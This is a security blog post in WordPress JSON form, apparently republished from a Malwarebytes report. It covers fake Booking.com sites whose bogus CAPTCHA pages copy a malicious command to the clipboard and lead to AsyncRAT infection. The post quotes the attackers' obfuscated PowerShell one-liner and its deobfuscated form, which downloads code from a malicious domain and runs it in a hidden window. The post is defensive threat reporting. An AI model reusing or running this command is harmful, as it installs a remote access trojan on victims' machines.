{"id":1733,"date":"2025-06-02T16:00:00","date_gmt":"2025-06-02T13:00:00","guid":{"rendered":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/"},"modified":"2025-06-02T16:00:00","modified_gmt":"2025-06-02T13:00:00","slug":"potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains","status":"publish","type":"post","link":"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","title":{"rendered":"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains"},"content":{"rendered":"<p>Cybercriminals have launched a campaign that targets users on gaming websites and social media platforms, and is also promoted through sponsored advertisements, directing individuals to counterfeit websites masquerading as Booking.com. Research indicates that a significant portion of travelers, approximately 40%, engage in online searches to book their travels, thereby generating numerous opportunities for cyber scammers.<\/p>\n<p>Initial signs of this campaign emerged in mid-May, with the redirect destination changing every two to three days.<\/p>\n<p>Clicking these links leads users to a familiar tactic: fraudulent CAPTCHA websites that hijack clipboard data and attempt to manipulate users into unwittingly infecting their devices.<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"1008\" height=\"613\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2025\/05\/fake_booking_sites_captcha.png\" alt=\"Fake CAPTCHA prompt\" \/><figcaption>Fake CAPTCHA prompt<\/figcaption><\/figure>\n<p>On these particular websites, checking the fake CAPTCHA box grants the site permission to access the clipboard.<\/p>\n<p>Subsequently, the fraudsters seek to have the visitor execute a Run command on their computer. 
This type of command is atypical in legitimate CAPTCHA forms and should raise immediate suspicion.<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"530\" height=\"554\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2025\/05\/instructions_without_warning.png\" alt=\"Instructions for visitors\" \/><figcaption>Instructions to execute harmful commands<\/figcaption><\/figure>\n<p>Users navigating with Chrome may encounter a warning:<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"317\" height=\"198\" src=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-1.webp\" alt=\"Chrome warning message\" \/><figcaption>Chrome warning may lack clarity<\/figcaption><\/figure>\n<p>While the warning is present, its purpose may not be immediately evident to users.<\/p>\n<p>Malwarebytes\u2019 Browser Guard users receive a more explicit warning:<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"479\" height=\"240\" src=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-2.webp\" alt=\"Browser Guard clipboard warning\" \/><figcaption>Clipboard warning from Malwarebytes Browser Guard<\/figcaption><\/figure>\n<p>The warning prompts the user with a message regarding clipboard access: \u201cHey, did you just copy something? Your clipboard was accessed from this website. 
Ensure you trust the source before using this information.\u201d<\/p>\n<p>It is essential not to dismiss these warnings; regardless of the familiarity of the website, the provided instructions should raise red flags.<\/p>\n<p>The content that may have been copied to the clipboard can appear nonsensical to some, while more experienced users will recognize the inherent risks.<\/p>\n<p><code>pOwERsheLl \u2013N\"O\"p\"rO\" \/w h -C\"Om\"ManD \"$b\"a\"np = 'b\"kn\"g\"n\"et.com';$r\"k\"v = I\"n\"v\"o\"k\"e-\"R\"e\"stMethod -Uri $ba\"n\"p;I\"nv\"oke\"-\"E\"xp\"r\"es\"sion $r\"k\"v<\/code><\/p>\n<p>The perpetrators employ techniques such as mixed casing, quote interruptions, and obfuscated variable names to conceal their true intentions. With the obfuscation removed, the command that would be executed is as follows:<\/p>\n<p><code>powershell -NoProfile -WindowStyle Hidden -Command \"$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv\"<\/code><\/p>\n<p>The malicious CAPTCHA form instructs the user to paste the clipboard content into the Windows Run dialog and run the command outlined above. When Browser Guard detects potentially harmful commands in the clipboard, it prefixes the copied content with a warning phrase, rendering it an invalid command and preventing infection.<\/p>\n<p>If an unwary user proceeds without protection, the command launches a concealed PowerShell window to download and execute a file named ckjg.exe, which subsequently downloads and executes a file labeled Stub.exe, identified by Malwarebytes as <a href=\"https:\/\/www.malwarebytes.com\/blog\/detections\/backdoor-asyncrat\">Backdoor.AsyncRAT<\/a>.<\/p>\n<p>Backdoor.AsyncRAT is a remote access Trojan designed to remotely monitor and control affected devices, compromising user security and privacy.<\/p>\n<h2>Indicators of Compromise (IOCs)<\/h2>\n<p>Domains and subdomains associated with this campaign rotate rapidly, changing every few days. 
A selection of recently active domains includes:<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"800\" height=\"668\" src=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-3.webp\" alt=\"Malwarebytes blocks malicious downloads\" \/><figcaption>Malwarebytes blocks download from bkngnet[.]com<\/figcaption><\/figure>\n<h2>Best Practices for Protection<\/h2>\n<p>To safeguard against these and similar threats, consider the following protective measures:<\/p>\n<ul>\n<li>Avoid executing instructions provided by unfamiliar websites without thorough consideration.<\/li>\n<li>Implement a robust anti-malware solution capable of blocking malicious websites and scripts.<\/li>\n<li>Utilize a browser extension that blocks harmful domains and phishing attempts.<\/li>\n<li>Disable JavaScript in your browser when visiting untrusted websites.<\/li>\n<\/ul>\n<p>Clipboard access is initiated by the JavaScript function document.execCommand(\u2018copy\u2019). While disabling JavaScript can prevent clipboard hijacking, it may also interfere with the functionality of many regularly visited sites. A suggested approach is to utilize distinct browsers for varied purposes.<\/p>\n<hr \/>\n<p>Protecting your digital identity is paramount in the face of rising cybersecurity threats. 
Employ comprehensive measures, including identity protection solutions, to maintain the security and privacy of your personal information.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cybercriminals have launched a campaign targeting users on gaming websites and social media platforms, as well as promoted through sponsored&#8230;<\/p>\n","protected":false},"author":1,"featured_media":1734,"comment_status":"open","ping_status":"closed","sticky":false,"template":"Default","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[28],"tags":[222,751,54],"class_list":["post-1733","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","tag-clipboard","tag-gaming","tag-malware"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains - Trustcrypt<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\" \/>\n<meta property=\"og:locale\" content=\"ar_AR\" \/>\n<meta property=\"og:locale:alternate\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains\" \/>\n<meta property=\"og:description\" content=\"Cybercriminals have launched a campaign targeting users on gaming websites and social media platforms, as well as promoted through sponsored...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\" \/>\n<meta property=\"og:site_name\" 
content=\"Trustcrypt\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-02T13:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-1.webp\" \/>\n<meta name=\"author\" content=\"Trustscrypt\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u0643\u064f\u062a\u0628 \u0628\u0648\u0627\u0633\u0637\u0629\" \/>\n\t<meta name=\"twitter:data1\" content=\"Trustscrypt\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0648\u0642\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u064f\u0642\u062f\u0651\u0631\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 \u062f\u0642\u0627\u0626\u0642\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\",\"url\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\",\"name\":\"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com 
Domains\",\"isPartOf\":{\"@id\":\"https:\/\/trustcrypt.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp\",\"datePublished\":\"2025-06-02T13:00:00+00:00\",\"author\":{\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f\"},\"inLanguage\":\"ar\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ar\",\"@id\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage\",\"url\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp\",\"contentUrl\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp\",\"width\":1792,\"height\":1024,\"caption\":\"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/trustcrypt.com\/#website\",\"url\":\"https:\/\/trustcrypt.com\/\",\"name\":\"Trustcrypt\",\"description\":\"\u0627\u0644\u0623\u0645\u0646 \u0647\u0648 \u0627\u0633\u0645\u0646\u0627 
\u0627\u0644\u062b\u0627\u0646\u064a\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/trustcrypt.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ar\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f\",\"name\":\"Trustscrypt\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ar\",\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g\",\"caption\":\"Trustscrypt\"},\"sameAs\":[\"http:\/\/trustcrypt.com\"],\"url\":\"https:\/\/trustcrypt.com\/ar\/author\/trustscrypt\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains - Trustcrypt","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","og_locale":"ar_AR","og_type":"article","og_title":"[:en]Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains[:] - Trustcrypt","og_description":"Cybercriminals have launched a campaign targeting users on gaming websites and social media platforms, as well as promoted through sponsored...","og_url":"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","og_site_name":"Trustcrypt","article_published_time":"2025-06-02T13:00:00+00:00","og_image":[{"url":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-1.webp","type":"","width":"","height":""}],"author":"Trustscrypt","twitter_card":"summary_large_image","twitter_misc":{"\u0643\u064f\u062a\u0628 \u0628\u0648\u0627\u0633\u0637\u0629":"Trustscrypt","\u0648\u0642\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u064f\u0642\u062f\u0651\u0631":"3 \u062f\u0642\u0627\u0626\u0642"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","url":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","name":"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com 
Domains","isPartOf":{"@id":"https:\/\/trustcrypt.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage"},"image":{"@id":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage"},"thumbnailUrl":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp","datePublished":"2025-06-02T13:00:00+00:00","author":{"@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f"},"inLanguage":"ar","potentialAction":[{"@type":"ReadAction","target":["https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/"]}]},{"@type":"ImageObject","inLanguage":"ar","@id":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage","url":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp","contentUrl":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp","width":1792,"height":1024,"caption":"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains"},{"@type":"WebSite","@id":"https:\/\/trustcrypt.com\/#website","url":"https:\/\/trustcrypt.com\/","name":"Trustcrypt","description":"\u0627\u0644\u0623\u0645\u0646 \u0647\u0648 \u0627\u0633\u0645\u0646\u0627 
\u0627\u0644\u062b\u0627\u0646\u064a","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/trustcrypt.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ar"},{"@type":"Person","@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f","name":"Trustscrypt","image":{"@type":"ImageObject","inLanguage":"ar","@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g","caption":"Trustscrypt"},"sameAs":["http:\/\/trustcrypt.com"],"url":"https:\/\/trustcrypt.com\/ar\/author\/trustscrypt\/"}]}},"_links":{"self":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/1733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/comments?post=1733"}],"version-history":[{"count":0,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/1733\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/media\/1734"}],"wp:attachment":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/media?parent=1733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/categories?post=1733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/tags?post=1733"}],"curies":[{"name":"wp","href":"h
ttps:\/\/api.w.org\/{rel}","templated":true}]}}